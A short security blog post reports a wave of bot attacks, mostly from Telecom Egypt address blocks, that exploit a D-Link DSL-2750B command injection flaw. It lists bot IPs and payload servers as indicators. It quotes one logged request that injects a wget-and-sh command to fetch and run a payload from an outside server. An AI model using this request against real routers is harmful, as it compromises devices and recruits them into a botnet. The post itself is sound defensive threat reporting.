Hakaied with love from Telecom Egypt

In the last two weeks I’ve seen a steady increase of bots trying to exploit a remote command execution flaw on D-Link routers. The majority of the attacks are originating from IP blocks belonging to Telecom Egypt Data.

The vulnerability, from what I understand is an old bug affecting D-Link firmware versions from 1.01 up to 1.03. Recently though, the flaw has been gathering some traction after being weaponized through MetaSploit.

MetaSploit - OS Command Injection

MetaSploit: D-Link DSL-2750B OS Command Injection.

From my experience, few companies will bother with patching network equipment so this will be yet another gift that keeps on giving. For the record, the list of bots and payload servers added to this post were extracted from a recent access log for paranoidpenguin.net.

Request:

41.47.174.215 - - [03/Aug/2018:13:24:56 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" "Hakai/2.0"

Payload script:

Hakai payload

Bots:

41.36.160.80
41.39.194.2
41.41.61.174
41.42.35.72
41.42.100.185
41.43.114.183
41.44.17.9
41.44.41.152
41.45.72.4
41.45.177.25
41.45.211.254
41.46.177.141
41.47.174.215
41.233.2.229
41.233.128.66
41.233.203.158
41.238.56.110
41.239.242.167
47.97.6.155
61.115.63.46
83.4.224.240
92.3.30.123
92.8.95.119
109.1.109.63
122.168.27.126
124.159.133.2
126.51.114.80
156.199.79.157
156.199.249.102
156.201.29.138
156.202.231.113
156.202.255.78
156.203.25.180
156.203.171.248
156.203.219.100
156.208.85.23
156.220.124.107
156.221.101.80
156.221.200.106
164.77.54.189
181.143.160.146
185.11.192.224
196.202.83.136
197.32.241.111
197.35.110.4
197.39.84.169
197.41.69.239
197.41.97.54
197.43.99.208
197.45.92.145
197.48.105.108
197.54.18.95
197.54.105.168
200.114.151.74

Payload servers:

46.166.185.42
104.244.72.82
178.128.11.199
185.62.190.191
185.172.164.41
199.195.254.118
217.61.6.127
hakaiboatnet.pw
g.mariokartayy.com

Hakai (user-agent): To destroy someone, or something.
According to the urban dictionary.